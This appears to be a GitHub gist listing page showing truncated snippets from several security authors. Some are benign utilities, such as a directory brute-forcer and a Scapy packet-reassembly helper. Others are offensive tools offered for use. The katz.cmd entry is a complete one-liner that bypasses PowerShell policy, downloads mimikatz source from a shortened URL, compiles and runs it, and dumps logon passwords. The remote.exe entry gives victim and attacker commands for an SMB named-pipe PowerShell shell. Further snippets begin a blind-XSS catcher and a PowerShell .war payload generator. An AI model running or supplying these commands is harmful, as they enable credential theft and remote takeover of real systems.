Skip to content

Instantly share code, notes, and snippets.

View sdcampbell's full-sized avatar

Steve Campbell sdcampbell

175 followers · 9 following
View GitHub Profile
@nullenc0de
nullenc0de / aodirb.py
Created November 21, 2022 15:17
pip3 install asyncio and pip3 install import aiohttp
import asyncio
import aiohttp
import time
import sys
import argparse
import os
parser = argparse.ArgumentParser(description='Directory Bruteforce')
parser.add_argument('-u', '--url', help='URL to bruteforce', required=True)
parser.add_argument('-w', '--wordlist', help='Wordlist to use', required=True)
@tothi
tothi / magisk_ramdisk_patch_avd.sh
Last active February 18, 2024 08:47
Apply Magisk patches on AVD (Android Emulator) RAMDISK images for running Magisk (root) on Android Emulators
#!/bin/bash
#
# patch ramdisk.img (for installing Magisk on x64 Android emulator)
#
# x86_64 on Android 12 (API Level 32) is supported/tested currently
#
# install AVD:
#
# sudo sdkmanager 'system-images;android-32;google_apis_playstore;x86_64'
@vavkamil
vavkamil / blind-xss-cloudflare-worker.js
Last active November 2, 2023 14:43
Serverless Blind XSS hunter with Cloudflare Worker
addEventListener("fetch", event => {
event.respondWith(handleRequest(event.request))
})
////////////////////////////////////////////////////////////////////////////////////////////////////
// ! DON'T LEAK THE SECRETS !
// Use Workers KV if you can https://developers.cloudflare.com/workers/reference/storage/
const telegram_token = "*****REDACTED*****";
const telegram_url = "https://api.telegram.org/bot" + telegram_token + "/sendMessage";
@xillwillx
xillwillx / katz.cmd
Last active December 17, 2023 06:29
mimikatz.cs one-liner
powershell -ExecutionPolicy Bypass -noLogo -Command (new-object System.Net.WebClient).DownloadFile('https://is.gd/Dopn98','katz.cs'); && cd c:\Windows\Microsoft.NET\Framework64\v4.* && csc.exe /unsafe /reference:System.IO.Compression.dll /out:katz.exe katz.cs && InstallUtil.exe /logfile= /LogToConsole=false /U katz.exe && katz.exe log privilege::debug sekurlsa::logonpasswords exit && del katz.*
@Rich5
Rich5 / basictable.py
Last active October 1, 2020 01:07
'''
basictable
Copyright (c) 2017 Rich Kelley
Contact:
@RGKelley5
RK5DEVMAIL[A T]gmail[D O T]com
www.bytesdarkly.com
License: MIT
@MarkBaggett
MarkBaggett / scapy_helper.py
Last active March 25, 2024 21:59
Python - SCAPY - Full Packet Session Reassembly
#From here https://pen-testing.sans.org/blog/2017/10/13/scapy-full-duplex-stream-reassembly
def full_duplex(p):
sess = "Other"
if 'Ether' in p:
if 'IP' in p:
if 'TCP' in p:
sess = str(sorted(["TCP", p[IP].src, p[TCP].sport, p[IP].dst, p[TCP].dport],key=str))
elif 'UDP' in p:
sess = str(sorted(["UDP", p[IP].src, p[UDP].sport, p[IP].dst, p[UDP].dport] ,key=str))
@mattifestation
mattifestation / gist:8ef36782ceb7f73d74cfb00c2a710301
Created November 19, 2016 17:07
remote.exe - a useful, MS signed SMB shell
# Command to run on the victim
# This will establish a PowerShell listener over the "pwnme" named pipe
remote /S "powershell.exe" pwnme
# Commands to run on an attacker system - if remote.exe is desired on the client (versus developing your own SMB pipe client)
runas /netonly /user:[Domain|Hostname\Username] "cmd"
remote /C [Hostname\IP] "pwnme"
@HarmJ0y
HarmJ0y / psWar.py
Created September 15, 2015 07:51
PsWar
#!/usr/bin/python
# Code that quickly generates a deployable .war for a PowerShell one-liner
import zipfile
import StringIO
import sys
def generatePsWar(psCmd, appName):